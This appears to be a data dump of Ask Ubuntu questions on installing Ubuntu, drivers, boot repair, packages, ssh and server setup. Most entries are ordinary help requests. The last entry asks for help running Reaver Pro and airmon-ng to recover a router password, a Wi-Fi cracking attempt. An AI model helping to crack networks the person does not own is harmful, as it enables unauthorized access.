set_tx=0 seq_len=0 key_len=0 ra0 : state : associated - > disconnected edit association dump in wireshark plaintext http : //paste.ubuntu.com/6956275/
422715	ubuntu 13.10 on vaio pro 13 , does not boot	i have a problem installing ubuntu 13.10 on a sony vaio pro 13 . here are the steps i followed so far ( with no success in booting in 13.10 ) : the vaio came with win 8 pre-installed so i created an image . i used an ubuntu 13.10 ( 64bit ) live usb to try ubuntu and installed it in the system wiping out win 8 in the process . i tried to boot ubuntu with no success , can not find the operating system error message so i used the image cds to get win 8 back again . second attempt i follow step 2 above , but i try to follow the instructions in http : //steffankarger.nl/2013/12/10/ubuntu-13-10-on-the-sony-vaio-pro-13/ with no success . trying to update grub gave me an error . then i found this : 13.10 does n't boot on vaio pro 13 so i followed the advise and ran boot repair . the output can be found here : http : //paste.ubuntu.com/6949962/ i still can not boot into ubuntu . moreover , i can not seem to get to bios settings ( assist key will not work ) , neither i can run ubuntu via the live usb any more . using the recovery image cds does n't work either . any ideas ?
422716	opencv build error : `` can not open options file specified with @ ''	i am having trouble installing opencv on my machine . i run ubuntu 12.04 . i have followed this guide : http : //www.raben.com/book/export/html/3 in order to install opencv 2.4.3 on my linux machine . however , when i execute the make command , `` making '' stops at 14 % , returns the following error 13 % ] built target opencv_imgproc [ 13 % ] generating qrc_window_qt.cxx [ 14 % ] generating src/moc_window_qt.cxx moc : can not open options file specified with @ usage : moc [ options ] < header-file > -o < file > write output to file rather than stdout -i < dir > add dir to the include path for header files -e preprocess only ; do not generate meta object code -d < macro > [ = < def > ] define macro , with optional definition -u < macro > undefine macro -i do not generate an # include statement -p < path > path prefix for included file -f [ < file > ] force # include , optional file name -nn do not display notes -nw do not display warnings @ < file > read additional options from file -v display version of moc make [ 2 ] : *** [ modules/highgui/src/moc_window_qt.cxx ] error 1 make [ 1 ] : *** [ modules/highgui/cmakefiles/opencv_highgui.dir/all ] error 2 make : *** [ all ] error 2 and then terminates . i have also installed all the required dependencies . thanks
422717	remote control desktop over bluetooth	is there a way to control my ubuntu desktop ( 13.10 ) remotely over bluetooth , with my android 4.4 device ?
422721	galaxy note 3 sm-n9005 lte dual boot for test or other app	i 'm apologize for my poor english but i 'm french : ) can i install dual boot android / linux on my galaxy note 3 sm-n9005 lte ? or another method exists ? i develop a big professional application in android and i want to try porting to linux phone .
422722	what is going on with my tar script ?	this might do better at stackexchange but i use ubuntu as my file server . so i 'm trying to use tar and gzip to only backup the last 6 months of changes on my file server and it is n't working . it does n't gzip anything , it puts the tar file in the same directory as the script ( not what i want ) , and it changes the name of the file to part of the tar string . here is the script : # ! /bin/bash tod= $ ( date + % f_ % h % m % s ) echo `` start '' echo $ tod echo `` testing tar , only the last 6 months '' tar -cvf -- newer-mtime=08-11-2013 /homedepot/yellowsolo/xz/6months/xz $ tod-last6months.tar /homedepot/yellowsolo/xz/official/official /homedepot/yellowsolo/xz/home/home echo `` now zipping '' gzip /homedepot/yellowsolo/xz/6months/xz $ tod-last6months.tar.gz echo $ tod echo `` done '' exit thanks in advance
422726	how to find top-level dependencies in a list of deb packages ?	suppose i have a list of packages : foo libfoo bar baz quux and suppose foo requires libfoo and bar , and baz requires quux . i want a way to put in that list , and get out this list : foo baz i.e . - i want the minimal list of packages to install which would - after dependency resolution - cause the entire list of packages to be installed .
422733	a script which can be run from a flash drive and modify startup applications	so i have created a script i would like to run on computers at startup on the network i manage . each is unique , so merging settings accross the network would be problematic . i could change each computer individualy but it is rather time consuming with hundreds of desktops . i am curious if there is a script which can be executed from a flash drive as a bash or other relatively simple way to add a startup command .
422734	triple boot - grub detecting only dos and ubuntu ( win 7 is not detected )	i just installed ubuntu , but when i rebooted the grub menu just detected ubuntu and dos now i am not able to boot windows 7 ( in fact windows 7 is not being detected at all ) i also tried os-prober command but that also did n't work . uefi first boot also did n't help me . os-probe command just detected dos operating system
422736	m-audio audiophile 192 driver for ubuntu 13.10	i have ubuntu 13.10 on my desktop dual booted with windows 7 . all is good except for my m-audio delta 192 sound card not working . i installed mudita24 ( envy24 ) but i think this is alsa ( do n't know what that is ) code for ice1712 chip . i now get some sound out but massively distorted , way too much gain . however after research i found my card contains ice1724 chip and so tried to find a driver for that chip . i found this . wanting to install this but not seeing a download link or what to do once i had downloaded it . open with the software center i presume , but all i got so far is a page of code .
422740	black screen when trying to install 13.10 , 12.04 works using nomodeset	i get a black screen ( with backlight on ) every time i try to boot up a livecd image from usb . i 'm trying to install 13.10 and tried both 32 and 64 bit versions . i can boot 12.04 lts release using nomodeset option , but nothing seems to work on 13.10 . here 's what i tried so far : adding nomodeset , modeset=0 option to the bootsection acpi=off , apci=off , noapci , and options like that acpi_backlight=vendor xforcevesa radeon.modeset=1 and 0 , i915.modeset=1 and 0 , and all the other boot parameters i could find i have a hp envy 14 laptop with switchable graphics , here 's my system specs : my laptop is a hp envy 14 , with the following specs : 2.4 ghz intel core i5-520m level 3 cache 3 mb 4 gb ddr3 ( 2 x 2048 mb ) ati mobility radeon hd 5650 graphics ( switchable ) the intel vga is gma hd 3000 i believe 1600x900 native display
422742	how to get drivers for toshiba satellite l50 a using ubuntu	update : so i figured it out and now have wifi working perfectly ! in case anyone else has this problem i 'll leave the links that helped me : http : //ubuntuforums.org/showthread.php ? t=2187780 wireless not working on toshiba satellite c55-a5281 good luck ! i bought a new laptop yesterday ( toshiba satellite l50-a ) and had a lot of problems dual booting as it came with win 8 pre-installed . it took me ages to figure out what to do and i could n't find much help- online even from people with the exact problem . so i ended up downgrading to windows 7 , which i thought would be fine since i 'd dual booted before with ubuntu and win7 . however my motherboard is still uefi so i tried every different way i found and nothing . in the end , i simply wiped windows entirely , and installed ubuntu from scratch . ubuntu loads up fine and and installed fine , however i now have none of the drivers i need ( i assume ) and ca n't connect to the internet ! so i 'm wondering how i would go about finding these drivers , i was able to get them when i put on windows 7 because they were available online , and i just transferred them via usb . but i ca n't find them for a linux system , apparently it should find them automatically which it did for my old laptop , but that had bios . as far as i cant tell the drivers for the wireless card are not there because it gives me no option to connect to the internet . any help would be much appreciated ! thanks ! edit : my wireless card is the network controller [ 0280 ] : realtek semiconductor co. , ltd. device [ 10ec:8179 ]
422743	ca n't execute .desktop file	i 'm new to ubuntu and linux ... i 'm trying to make a minecraft launcher .desktop file , and when i execute it , it says me : '' there was an error launching the application '' my code is : [ desktop entry ] name=minecraft genericname=playminecraft comment=game exec= '' /usr/bin/java -jar ~/desktop/minecraft.jar '' icon=/usr/share/icons/icon.png terminal=false type=application can anybody help ? thanks !
422747	ca n't install anything due to unmet dependencies libre office	i had libre office , but uninstalled it to install open office . it worked fine . yesterday , as i was trying to install new software from ubuntu software center , it gave me an error message , first because of third party repositories , which i disabled . then because of unmet dependencies , and it all has to do with libre office . i do n't understand a lot about computers . it 's my first time using ubuntu / cinnammon . so , i 'm confused . can anyone please help me ? i have already tried every answer i found here , witho no positive results . thank you .
422751	ubuntu and windows 8.1 dual boot	how can i use these both os on my laptop , without having to reinstall one ? for my personal use i always had ubuntu installed ( 13.10 32bit ) as my single os . then for my new job i needed to install win8.1 ( 64bit ) . now i have these both os on a separate partition , but i can boot only to a win8.1 os . is there a way that i can restore the grub or whatever to do , in order to have a choice to boot any of my two os ( preferably without having to reinstall one ) ?
422752	can not fully initialize 3rd monitor	i am trying to install the amd proprietary display driver . i have 3 screens , and 2 graphics cards . when i install the driver and reboot , only the screens on my primary adapter initialize . i run `` sudo amdconfig -- initial -f -- adapter=all '' and after rebooting my 3rd screen initializes , but its white with a big black x , no wallpaper ... my configuration : mainboard : msi 970a-g46 processor : amd fx-6300 @ 4.5ghz ram:16 gb gskill ripjaws ddr3 primary display : amd radeon hd7770 , dual monitors ( vga/hdmi ) secondary display : amd radeon r7 250 , single monitor ( dvi ) ( white screen )
422761	port forwarding using ssh with different users : how to debug connection problems ?	i have a server setup up with ubuntu 12.10 . got everything working nicely except for one thing : ssh port forwarding . i use the following command to forward some vnc server to my pc : ssh -l 5900 : node:5900 adminuser @ server that works very well . however , this is not true for other users : ssh -l 5900 : node:5900 someotheruser @ server this user is able to connect to the server ( can log in and do something ) , but the port is not forwarded , i.e . gvncviewer localhost is not finishing ( says connected to server but never asks for the password ) . what do i have to do in order to allow forwarding for the other ( or selected ) users as well ? edit : using ssh -vv ... i got the following messages when calling gvncviewer localhost and having connected using the adminuser : debug1 : connection to port 5900 forwarding to 10.100.0.8 port 5900 requested . debug2 : fd 9 setting tcp_nodelay debug2 : fd 9 setting o_nonblock debug1 : channel 3 : new [ direct-tcpip ] debug2 : channel 3 : open confirm rwindow 2097152 rmax 32768 ... -- -- - > it works for the someotheruser i get : debug1 : connection to port 5900 forwarding to 10.100.0.8 port 5900 requested . debug2 : fd 9 setting tcp_nodelay debug2 : fd 9 setting o_nonblock debug1 : channel 3 : new [ direct-tcpip ] -- -- - > here it hangs for a long time ... channel 3 : open failed : connect failed : connection timed out debug2 : channel 3 : zombie debug2 : channel 3 : garbage collecting debug1 : channel 3 : free : direct-tcpip : listening port 5900 for 10.100.0.8 port 5900 , connect from 127.0.0.1 port 39009 , nchannels 4 apparently the problem is caused by the vnc server and not by ssh .
422766	sudo not working due to incorrect permissions	i broke my ubuntu server by typing the command chmod -r 777 . im trying to get it back to normal . problems : when i try to use sudo , i get the error : sudo : unable to open /etc/sudoers.d/readme : permission denied sudo : /var/lib/sudo/cci writable by non-owner ( 040777 ) , should be mode 0700 then it asks for my password . these are my permissions on my /etc/sudoers directory are -r -- r -- -- - 1 root 723 feb 27 2013 /etc/sudoers i also ca n't start mysqld also .
422767	ubuntu is making the internet slow where windows pc is doing normal	just yesterday it was fine , since today ubuntu pc is completly slow internet tried with friefox/google chrome but same each page download is very slow , but from windows pc when i try its working both pc are in same network , i have also disabled the ipv6 why is it suddently so extream slow ? ? cant play any youtube video , unable to do any kind of browser , like its slow , but on windows pc on same network working just fine . edit : youtube is 1 hour ago open still its not playing , google-chrome is 1 hour ago applied to install its dead slow downloading . same thing on the windows pc working within 1 minute . somewhere something went very wrong the ubuntu pc
422771	ubuntu-sdk installation	so i have a clean ubuntu 64bit 12.04 vm ... please explain why the installation fails following simple instructions on the ubuntu site ? ( http : //developer.ubuntu.com/apps/create/get-the-sdk/ ) . as a former c # developer i would like to show my colleagues how easy this stuff is , but it just does not seem mature enough if you need to perform contortions to install the sdk . or am i doing something wrong ? for those interested the issues i get are ones of unmet dependencies because of conflicting version of a library ( see below ) . but to be honest i am more frustrated that the development environment does not work out of the bag , like the python or microsoft development environments . sudo apt-get install qtdeclarative5-ubuntu-ui-toolkit-plugin reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies . qtdeclarative5-ubuntu-ui-toolkit-plugin : depends : qtdeclarative5-unity-action-plugin ( > = 1.1.0 ) but 1.0.0bzr25precise0 is to be installed e : unable to correct problems , you have held broken packages . update : i have already been through all the similar questions in this site and none of them address this issue . i have tried even the detailed ones like this : how do i resolve unmet dependencies ? i am trying this on a clean 12.04 lts 64bit vm , so there should be no conflicts .
422774	wget not saving links in desired format	when i use a browser to save this page : http : //maine.craigslist.org/fuo/ the links are saved in such a way that they link to content . like this : href= '' http : //maine.craigslist.org/fuo/4323535885.html '' when i try to use wget , the links are $ wget -- no-parent maine.craigslist.org/fuo saved as : href= '' /fuo/4305913395.html '' i have tried options : -- spider -- page-requisites -- user-agent= '' mozilla/5.0 ( x11 ; ubuntu ; linux i686 ; rv:27.0 ) gecko/20100101 firefox/27.0 '' but the links all come out without the url attached . i have the rest of the script working , to parse out my location , and make a new list of links for furniture in my area . but i can not figure out how to get the same output as i get when i save the page via firefox . i thought using wget would be simplest . perhaps that isnt right . if i can achieve the same effect using some other software , so long as i can write a script to make it work , i will be happy .
422776	macbook pro boots from 8gb start-up usb , but not from external drive	i have what seems to be an odd anomaly on my hands . i 'm trying to run ubuntu 12.04 lts on my 2010 macbook pro . i 'd like to run it externally . i used my desktop installation of 12.04 and my 12.04 lts installation dvd to create a ubuntu start-up disk on an 8gb flash drive . i tested it by booting my macbook pro while holding the option key . the usb drive shows up as an efi boot and boots without a hitch when i choose `` try ubuntu without installing . '' after confirming that this worked , i assumed a full install of ubuntu 12.04 on an external hdd would work just as well . apparently , this is n't true . using the same boot method , the laptop fails to locate the external drive with ubuntu 12.04 on it . any thoughts ? i 've wondered if this is an efi/grub2 problem , as the 8gb start-up disk has some boot files that i ca n't find on the full installation on my external drive . additionally , i 'm sure refit will get mentioned if anyone responds here . i installed it in osx lion months ago ; however , my internal hdd appears to be dead , hence why i 'm trying to get ubuntu running on the laptop . in short , i do not have a functioning copy of osx at the moment . could this be as simple as dragging/dropping efi boot files from one disk to another ? thanks .
422777	broken pipe and other messages at logout and shutdown	desktop system with 12.04 lts 32-bit installed from usb , all updates applied . no other os on system . everything seems to work fine , but system will be used in a literacy center where anything unusual will cause students to be concerned . at logout of any user , i very briefly get a black screen with white messages : could not write bytes : broken pipe * checking battery state ... at shutdown , i briefly get the preceding messages , plus : acpid : exiting checking for running unattended-upgrades : speech-dispatcher disabled : edit /etc/default/speech-dispatcher i had to use a camera to capture these messages , as they are displayed for well under 1 second . there is no other symptom . following instructions in another post , i booted in gru mode and repaired broken packages . it did not appear to me that anything was actually done and the symptoms did not change . three questions : is something really wrong here ? if not , how can i suppress the display of these messages so they do n't trouble the students ? is there a log file somewhere that i could have found these messages in without using the camera ? i am new to unix , so i 'll appreciate it if responses are detailed or include pointers to how-to information .
422781	brightness in ubuntu 13.10	i have installed ubuntu 64-bit 13.10 today . but the brightness is too much even in the least possible value . how can i change it ?
422787	unable to type in tty ubuntu 13.10	when i ctrl-alt-f1 while in the desktop , i can access a tty screen ; however , i can not type anything into the log in prompt - as if the keyboard no longer works . i can , however , revert to the desktop vis ctrl-alt-f1 . i had this problem using 13.04 as well . i have no problem typing in the terminal window . i have not tinkered with the typing settings under the universal access system setting ; all of those functions are off . tty has worked on occasion , but usually does not work . could this be a problem with my keyboard , if i 'm able to use ctrl commands ? i have also had problems with the nvidia drivers , though i 'm not sure that 's relevant here . i am happy to provide any additional information ; any help would be appreciated . thanks .
422793	i can not seem to install ubuntu	my ubuntu installer can not create an ext4 partition the thing that shows up is always this : i have nothing installed in my computer . ( i just deleted and created a new ext4 partition using gparted . please help ! i checked my hard drive using ubuntu disk utility ( from a live cd ) and it 's as follows
422801	can applications on the shell activities overview show icons ?	this is the gnome activities overview it 's kinds slow reading through or looking for applications that look very similar . anyone know of a way to show icons alongside the names ? it 's much faster to look for icons
422803	compile qt3-program on kde4	i want to compile a program ( ktigcc ) , but it is intended to be used on kde3 , using qt3 libs . is there any possibility of compiling and using this program in my current kde4 ? trying to run ./configure results in : sh : 1 : kde-config : not found project error : kde 3 kdelibs required . the configure script : # ! /bin/bash qmake_args= '' '' if test ! -z `` $ 1 '' then case `` $ 1 '' in -- prefix=* ) qmake_args=`echo $ 1 | sed 's/^ -- prefix/prefix/'` ; ; esac fi qmake $ qmake_args if [ $ ? == 127 ] ; then echo `` error : qt 3 required '' ; fi ( i 'm rather new to kde , so i may not be to exact with the kde expressions etc . ) note : i 'm not using kubuntu , but ubuntu with kde-standard installed .
422804	ubuntu 64bit 12.04 lts upgraded and now stuck rebooting at 5 dots screen	i did an update/upgrade and the nvidia driver 3.04.116 came down , at which point my dell machine ( with an nvidia 9500 gt ) wo n't boot into the gui any more . i searched the web and here and tried a lot of things ( deleting and regenerating xorg.conf , reinstalling the nvidia drivers , etc , etc , but so far , no luck . it 's now stuck every time at the 5 orange dots screen , with the dots doing their standard `` rotation '' thing . i can get to grub if i hit enter and time it right , or i also can ssh into the box from my other box so that 's not a problem either . please help me figure out what i need to do next . thanks-
422807	bash_profile colors	i have found these settings in many bash profile files and i do n't know what they mean or do . can anybody explain them ? thanks ! # terminal colors nm= '' \ [ \033 [ 0 ; 38m\ ] '' # means no background and white lines hi= '' \ [ \033 [ 0 ; 37m\ ] '' # change this for letter colors hii= '' \ [ \033 [ 0 ; 31m\ ] '' # change this for letter colors si= '' \ [ \033 [ 0 ; 33m\ ] '' # this is for the current directory in= '' \ [ \033 [ 0m\ ] ''
422808	problem opening .sh files	i 'm trying to install netbeans-7.4-linux.sh on my 13.10 ubuntu . after using terminal sudo sh ./netbeans-7.4-linux.sh it is telling me can not open netbeans-7.4-linux.sh . how do i get past this ?
422809	login as another user via terminal without root permissions	i work at a small company and use putty on a windows machine to tunnel into our file server as `` root . '' it is a very simple file server running samba with about 30 users . each user has distinct permissions ( acls ) . now , i would like to know if there is a way for me to switch to another user while logged in as root in order to check the acl permissions . for example , i have tried : su username this switches me to the username specified but it also gives the username superuser permissions , so when i enter a directory and then `` ls '' i see what root would see instead of seeing what the user would actually see without superuser permissions . thank you in advance for your assistance . edit : this is the output of ls -lsa / | grep -e root $ 4 drwxr-xr-x 43 root root 4096 2011-02-23 11:54 root
422811	monitor not properly recognized	i 've ubuntu 13.10 and i use to monitor : one connected via normal monitor 's cable , and another connected via hdmi . at some moment , i turned on my pc and it ca n't recognize the right size of the monitor connected via hdmi . it worked for much time , and one day with apparently no reason start recognize it with a wrong size : ( how to proceed ? thanks all for help
422812	is ftp accesible outside ssh while using ftp-ssh	i 'm trying to set up ftp over ssh , and i did set up the ssh server , but filezilla keeps saying `` econnrefused - connection refused by server '' which i take to mean that i need to set up an ftp server on my machine as well . i found directions here about how to set up vsftpd , but i 'm concerned about security . is this going to be accessible outside the ssh , and if so , how do i stop this functionality ? edit- this is only going to be me using ftp , by the way . i need to access my files off site occasionally .
422817	unknown display	are new to ubuntu and trying to connect my tv and pc brought a vga splitter and as soon as i connect it , the screen goes black . also in the display screen when i have just the desk top monitor plugged in it comes up unknown and i ca n't hit the mirror button . the system i’m running release 12.04 ( precise ) 32-bit kernel linux 3.8.0-35-generic gnome 3.4.2 intel® pentium ( r ) 4 cpu 2.53ghz graphics vga compatible controller but according to the system settings gallium 0.4 on llvmpipe ( llvm 3.2 , 128 bits ) os type 32-bit any tips
422825	ubuntu 12.04 automatically logs out when i open facebook	every time i open facebook.com in mozilla or chromium my ubuntu logs out automatically sort of crashes , the display goes white . but all other sites are working .
422826	problem using âsudo suâ command	i ca n't login as root- gladiss @ gladiss-lenovo-g580 : ~ $ sudo su sudo : /usr/lib/sudo/sudoers.so must be only be writable by owner sudo : fatal error , unable to load plugins i 've tried all commands suggested in similar threads . nothing helped . maybe cause this :
422827	how to log in as guest user via terminal ?	i need to login as a guest user via a terminal for experimental purposes for checking the working of one of scripts . i know i can log in as a different user using su username or su - username . however , i ca n't log in using this command as su guest . i can auto-complete this as su guest- < some_id > , but this asks for a password i am unaware of . how do i login , then , as the guest user ?
422829	how to make headphone functions work in ubuntu ?	in os x , the volume control and play/pause button work , but it does n't on ubuntu . i 'm on ubuntu 13.10 , and i have the beats solo headphones .
422830	install only ubuntu os on ssd ( 22gb ) [ samsung np530 ]	install ubuntu on the ssd and all apps and documents in the hdd . can i ?
422833	ubuntu crash during the update to 13.10	i just tried to update from 13.04 to 13.10 . however , during the process , my internet connection was cut and i restarted the computer . the installation was not successful and my computer is very slow and many options do n't work . among them , the internet connection . i tried to restart in recovery mode . i found out that many packages were missing ( many of them python packages ) . however , since my internet access does n't work ( i ca n't connect with ubuntu ) , i ca n't download them . how can i fix these packages ?
422834	sound problems with ubuntu 12.04	why the sound of movies and video is always a problem after a major update . this a recurrence item with all the ubuntu base os . why do not develop a control interface that could help the user to select the compatible libraries to maintain the sound at working condition .
422836	check disk benchmark result with the disk running the os	is there a way to check my disks benchmark results that 's currently running the ubuntu i 'm on ? or do i have to unplug the disk and check it in another computer ?
422837	how i can protect my internet connection from being spoofed ?	( i 'm a new ubuntu user ) is it possible that someone on the same network can cut my internet connection ? is there anyway to protect it from being `` spoofed '' ? how can i identify who tried to do that ? thanks !
422846	ubuntu 13.10 problems with nvidia graphics drivers , xserver not going up	i had problem with running age of empires ii on wine . it was showing some problem with loading some nvidia file ( i can not make this error again ) , and was suggesting using nouveau drivers , even if i was using them . i decided to reinstall the nvidia drivers , and install the newest one . i used that tutorial : http : //news.softpedia.com/news/how-to-install-the-latest-nvidia-331-20-drivers-in-ubuntu-13-10-399182.shtml . after installation and reboot , my xserver was not going up anymore . using the console i removed all the nvidia drivers : sudo apt-get purge nvidia-* . with that , the system is working again , but the resolution is low . after that , i removed repository from that tutorial , and installed the nvidia drivers again , but it happens every time - the xserver is not going up , and i need to remove nvidia drivers . what can i do ? additional info : when i try to install nvidia-current drivers with apt-get , i get that info : some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies . nvidia-current : depends : xorg-video-abi-11 but it is not installable or xorg-video-abi-12 but it is not installable or xorg-video-abi-13 but it is not installable recommends : nvidia-settings-current but it is not installable e : unable to correct problems , you have held broken packages . after installing it with aptitude the effect is as i described before .
422849	correctly setup apache virtual hosts with multiple users	thanks in advance for any help you may provide . i 've self taught myself using linux ( ubuntu ) , apache , virtual hosts and a few bits with regards to security , though i 've yet to put these all together seamlessly . i 've also learnt the hard way from mistakes made in the past with regards to not setting up user accounts and sites/virtualhosts correctly . i ssh into the server as root ( i know , very bad ) , and created all the virtual hosts and files manually , thus all being owned by root . i 've had an old version of joomla exploited and malicious spam code inserted in all my other virtual hosts . i 'm in the process of moving to a new server and am looking for the correct steps to follow with regards to setting up virtual hosts and users accounts that can access them . because we use 3rd party software , we have on a occasion needed someone else to ftp into the site to investigate their website files . our current server is version 10.04 , however the new server is version 12.04 . all website files are setup under /home/www/site1.com /home/www/site2.com /home/www/site3.com etc in short , i guess this is what i 'm after . how do i correctly setup a virtual host and user , so that it only has access to its own files , and not any other virtual host on the server . for example , should that site get exploited with malicious code , it ca n't infect other sites on the server how would i setup users so that they can only ftp into their given files and not access any of the other sites . as mentioned before , there are numerous articles detailing how to do any one of these steps , but nothing that brings them seamlessly together . really appreciate the help anyone can offer . please feel free to ask for any additional information you may need to give advise . i 'm currently following tutorials to setup chroot , however i fear i 'm not doing this correctly as i 've picked up a few inconsistencies along the way . am also investigating jailkit .
422855	right click definitions not showing	i 've transitioned from mac and i 'm used to being able to highlight and right click an item and defining it . however , i do not see this option in ubuntu . what plugin could i use to implement this ? //on a side note , i have no idea what i should 've put for the tags because i could n't put define or definitions or anything like that . if your an op and you have a better idea for a tag , please put it and edit this note out please
422856	how to get silverlight and flash 10+ to work in chromebook and ubuntu 12.04 with firefox	i would like to watch content from many of tv-station 's streaming services . first i need flashplayer 10+ with firefox and then silverlight ( mac and windows are supported i think , chromebook is not , right ? ) . i have : - samsung chromebook - in the chromebook ubuntu 12.04 installed ( looks to be very minimal set up ) - in the ubuntu i am using firefox ( i did n't success with chrome installation on this chromebook ; - ) : -d - fun ! ) i have tried to : - as `` root '' to run sudo rpm -i flash-plugin-11.2 ... ..i386.rpm - solve the problem when running the previous rpm fails . it says i need glibc > = 2.4 and also bin/sh is needed ( what ? ? ? ) . - due to need of glibc i updated my repository at /etc/apt/sources.list but finally it says that apt-get can not locate package glibc . - install by apt-get `` build-essential '' to get glibc but it did n't help at all . glibc is not updated . there is no success : - ( . i can not even dream about silverlight before getting to work something so basics like flashplayer . if you could help me to go forward it would be very nice : - ) . i am dreaming of getting everything what i ever need to work with my chromebook except photoshopping ( it 's done by my mac ) thanks ! with best regards , hermann
422857	can not find eth1 interface	i installed ubuntu precise on my ibm x3100 server and can not find eth1 on my interfaces file . any clue what should i do ? thank you
422859	ldconfig ignores some files under /usr/local/lib/	when trying to start a certain program , i got the following error message : error while loading shared libraries : foo.so.0 : can not open shared object file : no such file or directory therefore i built the required library and installed it under the directory /usr/local/lib/ . however , after building the library , there were only the files foo.so , foo.so.1 and foo.so.1.0.8 under /usr/local/lib/ . so i created an additional symbolic link to foo.so.1.0.8 named foo.so.0 . i checked that /usr/local/lib is included in some file under /etc/ld.so.conf.d/ and started sudo ldconfig . unfortunately ldconfig seems to ignore my self-created symbolic link . ldconfig -v prints only the following line : foo.so.1 - > foo.so.1.0.8 ldconfig -p prints only the following two lines : foo.so.1 ( libc6 , x86-64 ) = > /usr/local/lib/foo.so.1 foo.so ( libc6 , x86-64 ) = > /usr/local/lib/foo.so there is not a blind bit of the file foo.so.0 . what do i have to do ?
422864	please help ! ! video card prb ubuntu 13.04	i have ubuntu 13.04 + kde 4.11 and two nvidia cards . one onboard nforce 980a/780a sli and one nvidia gtx 280 , both of them are connected to one tv- lg 109 ' . gtx 280 is connected from cable dvi+hdmi nforce980a/780a â by cable hdmi+hdmi i would like to use onboard card with sound and video and ubuntu he does n't recognize , in bios is activated , drivers are installed and gtx does n't see a bigger resolution like 1024x768 please help me ! !
422865	trying to run multiple instances of vlc	i 'm a total noob at linux ( but i 'm learning ) . i am trying to run a video presentation - but i need it to run three separate mpeg or avi videos at precisely the same time and in sync . i read http : //www.videolan.org/doc/play-howto/en/ch04.html which shows how to address each of the three monitors with each instance of vlc.| the wall feature seems cool , but i 'm using 3 monitors for video output and one for a control panel ( please excuse the windows entomology ) . the option : -- vout allows you to select the video output module . seems to be the way to address each video output separately ( please correct me if i 'm wrong about this ) so what i 'm asking is basically this : if i want to run three separate videos , to three separate monitors using ubuntu and vlc , how can i run all three at exactly the same time , and is there a way to get them to sync ? ( midi , smpte time code , etc ? ) i need just one channel of either mono or stereo audio to run from ( let 's say ) the first video file . any and all input would be very welcome . ( but please keep in mind , i 'm rather new at linux , so please have patience with me ) thanks in advance , rik
422866	map sysrq to a key other than altrgr+prtscr	the keyboard layout on my laptop ( lenovo x230 or t430s ) makes it too easy to trigger magic sysrq , since altgr and prtscr keys are right beside each other . i 've disabled magic sysrq because i 'd often kill every process accidentally . is it possible to change the magic sysrq key combination ? thanks !
422868	how do i speed up searches in files ?	i know that on windows you can index your files to find things faster . is there something like this for ubuntu because when i search for something like /usr under files it says searching and it takes really long .
422869	all my ubuntu one files show as 1byte each	i 've lost the contents of all my ubuntu one files . i 've logged in via the website , and they all show as being 1 byte each in size . i 've contacted support about this twice now , but have yet to receive an acknowledgement in both instances , never mind a reply . i tried to do a file recovery , but the recovery folder is empty . are they gone for good ? steve
422872	deja dup backup restore has failed me	i get this message when trying to restore from deja dup on 13.10 backup location â/media/lawsonfamily/my passport/duplicity-full.20140210t071338z.vol177.difftar.gzâ does not exist . but , it does exist ! i have my backups on an external drive that i am able to open but deja dup wo n't restore my files . i have a lot of family pictures that i 'd like to recover but this does not make me hopeful . help please .
422874	how do i keep a window open in front of other windows ?	whenever you have multiple windows open , is there a way to keep one window on top , or at the front of the others ?
422877	how do i set up a ltsp server inside a windows dhcp network	how do i set up a ltsp server within a windows dhcp network . how do you make it to only assign dhcp to certain mac addresses ? then once that is done , do i need to rebuild the thin client ?
422878	why do i see two vga compatible controllers on my pc ?	i want to use ubuntu on a hp pavilion g7-1246ef , but i seem to have problems with the vga when running ubuntu on this computer - the cooler is very loud and the laptop is hot , and this does n't happen when booting in win7 . running sudo lspci |more i see this line : 00:02.0 vga compatible controller : intel corporation 2nd generation core process or family integrated graphics controller ( rev 09 ) but after pressing enter several times ( for `` more '' info ) i also see the line : 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati seymour [ radeon hd 6400m/7400m series ] why are there two vga ?
422880	can not access horizon , python compiling issue	i 've successfully deployed openstack havana using juju over ubuntu precise . each charm on dedicated server and everything looks normal . when i tried to access horizon , i get the login page and successfully authenticate , then i get 500 internal server error . i checked /var/log/apache2/error.log and found the first portion of this : http : //pastebin.ubuntu.com/6957430/ after some googling i followed the instructions on this thread ( https : //bugs.launchpad.net/ubuntu/+source/libapache2-mod-python/+bug/1073147 ) , yet i still could n't access horizon and found the second portion on the pastebin log file . then lastly i tried sudo a2dismod deflate to change the logging mode , so i found the third portion on the log file . now the status of horizon charm is 1 hook failed `` config-changed '' and i still can not access it . this is my juju status output : http : //pastebin.ubuntu.com/6957440/ please help , thank you
422881	how can i activate repositories needed by boot-repair ?	so i recently used the boot-repair utility to reinstall grub . after doing this , every time i try to log into ubuntu , i get a kernel panic immediately following the grub boot menu . it says something like kernel panic - not syncing , tried to kill init ! other threads asking about similar problems have suggested it might be a ram problem . i ran memtest , and everything went fine , and in any case , i can boot into windows 7 with no problems . from a 13.10 live dvd , i tried using boot-repair to purge and reinstall the kernel ( though i 'm not sure that 's actually what i should be doing ) . after working for a bit , i get some message like please enable repositories containing the [ linux ] packages in the software sources . i 've enabled all the repositories available in the software sources screen , and ran sudo apt-get update , but that has n't worked . furthermore , boot-repair at this point pops up what appears to be a list of additional repositories , and gives me the option to add them , though this does n't seem to actually do anything . i used boot repair to create a bootinfo summary , which is here : http : //paste.ubuntu.com/6957420/ any help here would be greatly appreciated .
422883	why does apt-get 's -- reinstall option do nothing ?	i thought the -- reinstall option was supposed to reinstall the specified packages . but when i invoke sudo apt-get purge -- reinstall < packagenames > , < packagenames > are purged but not reinstalled . what is the correct usage of the option ? am i doing something wrong ?
422884	sudo airmon-ng start wlan0 doesnt find interface ?	100 % linux newbie here , sorry for all the dumbness . i 'm trying to recover a router password using reaver pro . i 'm using oracle vm virtual box to run it . everytihng goes along with the tutorials but when i use `` sudo airmon-ng start wlan0 '' it doesnt `` find '' it to monitor i mean : there is nothing under the words interface chipset driver can you help ? so much appreciated edit- also , iwconfig only finds eth0 and eth1 , no wlan0
